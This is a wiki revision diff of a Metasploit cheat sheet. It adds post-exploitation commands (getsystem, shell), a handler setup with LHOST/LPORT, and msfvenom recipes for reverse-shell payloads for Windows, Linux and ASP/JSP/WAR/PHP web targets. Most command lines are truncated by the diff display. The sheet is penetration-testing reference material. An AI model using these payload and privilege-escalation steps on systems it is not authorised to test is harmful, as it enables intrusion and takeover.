cheat_sheets_metasploit
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
cheat_sheets_metasploit [2022/12/31 00:42] – [Modules & Categories] gman | cheat_sheets_metasploit [2022/12/31 21:50] (current) – [Two Common Commands] gman | ||
---|---|---|---|
Line 49: | Line 49: | ||
* Example, CVE: '' | * Example, CVE: '' | ||
* Example, type: '' | * Example, type: '' | ||
+ | |||
+ | **Alternative Search Option:** Rapid7 maintains a [[https:// | ||
'' | '' | ||
- | **Search | + | **Parameters (Keywords): |
^ Keyword | ^ Keyword | ||
Line 192: | Line 194: | ||
---- | ---- | ||
+ | |||
+ | ===== Syntax (Examples) ===== | ||
+ | |||
+ | ==== Two Common Commands ==== | ||
+ | |||
+ | After a successful exploit (and assuming your payload was Meterpreter), | ||
+ | |||
+ | < | ||
+ | # priv esc to admin | ||
+ | getsystem | ||
+ | |||
+ | # get a shell in the exploit directory on the target | ||
+ | shell | ||
+ | </ | ||
+ | |||
+ | |||
+ | ==== msfvenom ==== | ||
+ | |||
+ | See [[cheat_sheets_various# | ||
+ | |||
+ | ==== MSF Handler ==== | ||
+ | |||
+ | '' | ||
+ | |||
+ | < | ||
+ | use exploit/ | ||
+ | set PAYLOAD <Payload name> | ||
+ | set LHOST <LHOST value> | ||
+ | set LPORT <LPORT value> | ||
+ | </ | ||
+ | |||
+ | ==== Non-Meterpreter Binaries ==== | ||
+ | |||
+ | **Staged Payloads for Windows** | ||
+ | |||
+ | < | ||
+ | # x86 | ||
+ | msfvenom -p windows/ | ||
+ | |||
+ | # x64 | ||
+ | msfvenom -p windows/ | ||
+ | </ | ||
+ | |||
+ | **Stageless Payloads for Windows** | ||
+ | |||
+ | < | ||
+ | # x86 | ||
+ | msfvenom -p windows/ | ||
+ | |||
+ | # x64 | ||
+ | msfvenom -p windows/ | ||
+ | </ | ||
+ | |||
+ | **Staged Payloads for Linux** | ||
+ | |||
+ | < | ||
+ | # x86 | ||
+ | msfvenom -p linux/ | ||
+ | |||
+ | # x64 | ||
+ | msfvenom -p linux/ | ||
+ | </ | ||
+ | |||
+ | **Stageless Payloads for Linux** | ||
+ | |||
+ | < | ||
+ | # x86 | ||
+ | msfvenom -p linux/ | ||
+ | |||
+ | # x64 | ||
+ | msfvenom -p linux/ | ||
+ | </ | ||
+ | |||
+ | ==== Non-Meterpreter Web Payloads ==== | ||
+ | |||
+ | < | ||
+ | # asp | ||
+ | msfvenom -p windows/ | ||
+ | |||
+ | # jsp | ||
+ | msfvenom -p java/ | ||
+ | |||
+ | # war | ||
+ | msfvenom -p java/ | ||
+ | |||
+ | # php | ||
+ | msfvenom -p php/ | ||
+ | </ | ||
+ | |||
+ | ==== Meterpreter Binaries ==== | ||
+ | |||
+ | **Staged Payloads for Windows** | ||
+ | |||
+ | < | ||
+ | |||
+ | # x86 | ||
+ | msfvenom -p windows/ | ||
+ | |||
+ | # x64 | ||
+ | msfvenom -p windows/ | ||
+ | </ | ||
+ | |||
+ | **Stageless Payloads for Windows** | ||
+ | |||
+ | < | ||
+ | # x86 | ||
+ | msfvenom -p windows/ | ||
+ | |||
+ | # x64 | ||
+ | msfvenom -p windows/ | ||
+ | </ | ||
+ | |||
+ | **Staged Payloads for Linux** | ||
+ | |||
+ | < | ||
+ | # x86 | ||
+ | msfvenom -p linux/ | ||
+ | |||
+ | # x64 | ||
+ | msfvenom -p linux/ | ||
+ | </ | ||
+ | |||
+ | **Stageless Payloads for Linux** | ||
+ | |||
+ | < | ||
+ | # x86 | ||
+ | msfvenom -p linux/ | ||
+ | |||
+ | # x64 | ||
+ | msfvenom -p linux/ | ||
+ | </ | ||
+ | |||
+ | ==== Meterpreter Web Payloads ==== | ||
+ | |||
+ | < | ||
+ | # asp | ||
+ | msfvenom -p windows/ | ||
+ | |||
+ | # jsp | ||
+ | msfvenom -p java/ | ||
+ | |||
+ | # war | ||
+ | msfvenom -p java/ | ||
+ | |||
+ | # php | ||
+ | msfvenom -p php/ | ||
+ | </ | ||
cheat_sheets_metasploit.1672447327.txt.gz · Last modified: by gman